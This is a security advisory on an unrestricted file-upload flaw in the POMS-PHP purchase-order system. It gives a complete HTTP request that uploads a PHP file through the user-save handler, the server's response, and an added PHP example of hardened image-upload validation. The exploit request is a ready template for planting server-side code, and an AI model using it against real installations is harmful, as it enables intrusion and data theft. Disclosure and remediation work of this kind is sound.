POMS-PHP (by: oretnom23 ) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit

2024.11.11
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

## Title: POMS-PHP (by: oretnom23) v1.0, Copyright © 2024. All rights reserved - File Upload Vulnerability exploit

## Author: nu11secur1ty

## Date: 11/08/2024

## Vendor: https://github.com/oretnom23

## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#google_vignette

## Reference: https://portswigger.net/web-security/file-upload

## Description:

The `img` parameter of the user save handler (`classes/Users.php?f=save`) is vulnerable to unrestricted file upload: neither the file name nor the file content is validated. An already logged-in user of the system can therefore upload arbitrary files, including PHP scripts, which makes it easy to obtain sensitive information from the server or, worse, to destroy the installation.

STATUS: HIGH - Vulnerability

[+] Exploit:

```
POST /purchase_order/classes/Users.php?f=save HTTP/1.1
Host: pwnedhost.com
Cookie: PHPSESSID=90lhc202cbb0s5adki1gd5suj0
Content-Length: 709
Sec-Ch-Ua-Platform: "Windows"
Accept-Language: en-US,en;q=0.9
Sec-Ch-Ua: "Not?A_Brand";v="99", "Chromium";v="130"
Sec-Ch-Ua-Mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoIjZa6BqBYZRIp8V
Origin: https://pwnedhost.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://pwnedhost.com/purchase_order/admin/?page=user
Accept-Encoding: gzip, deflate, br
Priority: u=1, i
Connection: keep-alive

------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="id"

1
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="firstname"

Adminstrator
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="lastname"

Admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="username"

admin
------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="password"

------WebKitFormBoundaryoIjZa6BqBYZRIp8V
Content-Disposition: form-data; name="img"; filename="info.php"
Content-Type: application/octet-stream

<?php phpinfo(); ?>
------WebKitFormBoundaryoIjZa6BqBYZRIp8V--
```

[+] Response:

```
HTTP/1.1 200 OK
Date: Fri, 08 Nov 2024 08:52:20 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

1
```

## Reproduce: [href](https://www.youtube.com/watch?v=XODY8SSz62c)

## Demo PoC: [href](https://www.nu11secur1ty.com/2024/11/poms-php-by-oretnom23-v10-copyright_8.html)

## Time spent: 00:05:00

--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/
0day Exploit DataBase https://0day.today/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
nu11secur1ty <http://nu11secur1ty.com/>
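The handler in the PoC accepts whatever arrives in the `img` part, so a file named `info.php` containing PHP source is stored as-is. The following is an added example of how such a profile-image upload can be validated in PHP; it is not code from the advisory or from the POMS-PHP project. The function names, the size limit, the allowlist and the upload directory are assumptions chosen for illustration. It treats the client-supplied file name and `Content-Type` as untrusted, checks the real bytes, and never lets the client pick the stored name.

```php
<?php
// Added example, not part of the advisory or the POMS-PHP project.
// Hardened validation for an image upload such as the `img` field above.
// MAX_IMAGE_BYTES, ALLOWED_IMAGE_TYPES and the function names are assumptions.

declare(strict_types=1);

const MAX_IMAGE_BYTES = 2 * 1024 * 1024;

// Allowed final extensions, each mapped to the MIME type the bytes must really have.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

/**
 * Validate one $_FILES entry and return a server-chosen filename, or throw.
 * Nothing taken from the client (name, Content-Type) is trusted on its own.
 */
function validate_image_upload(array $file): string
{
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('Upload failed or missing');
    }
    if (!is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Not an uploaded file');
    }
    if ($file['size'] > MAX_IMAGE_BYTES) {
        throw new RuntimeException('File too large');
    }

    // Only the last extension counts, lower-cased; "info.php" is rejected here.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        throw new RuntimeException('Extension not allowed');
    }

    // Sniff the MIME type from the file bytes, ignoring the header the browser sent
    // (the PoC sends application/octet-stream for PHP source).
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($file['tmp_name']);
    if ($detected !== ALLOWED_IMAGE_TYPES[$ext]) {
        throw new RuntimeException('File content does not match extension');
    }

    // Defence in depth: the file must also decode as an image.
    if (@getimagesize($file['tmp_name']) === false) {
        throw new RuntimeException('Not a decodable image');
    }

    // Server-generated name: no client-controlled text reaches the filesystem path.
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Store the validated `img` upload and return the stored name, or null if the
 * request carried no image. $uploadDir is assumed to be outside the web root
 * (or a directory where PHP execution is disabled).
 */
function save_profile_image(string $uploadDir): ?string
{
    if (empty($_FILES['img']) || $_FILES['img']['error'] === UPLOAD_ERR_NO_FILE) {
        return null; // keep the existing picture
    }
    $name = validate_image_upload($_FILES['img']);
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!move_uploaded_file($_FILES['img']['tmp_name'], $dest)) {
        throw new RuntimeException('Could not store file');
    }
    return $name;
}
```

Against the request in the PoC, the extension check alone rejects `info.php`; renaming the same PHP payload to `info.jpg` would then fail the `finfo` and `getimagesize` checks because the bytes are not an image. Storing uploads outside the document root (or with the PHP handler disabled for that directory) covers the remaining case of a valid image file that also carries embedded PHP, since it is then never executed even if served back.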


Copyright 2024, cxsecurity.com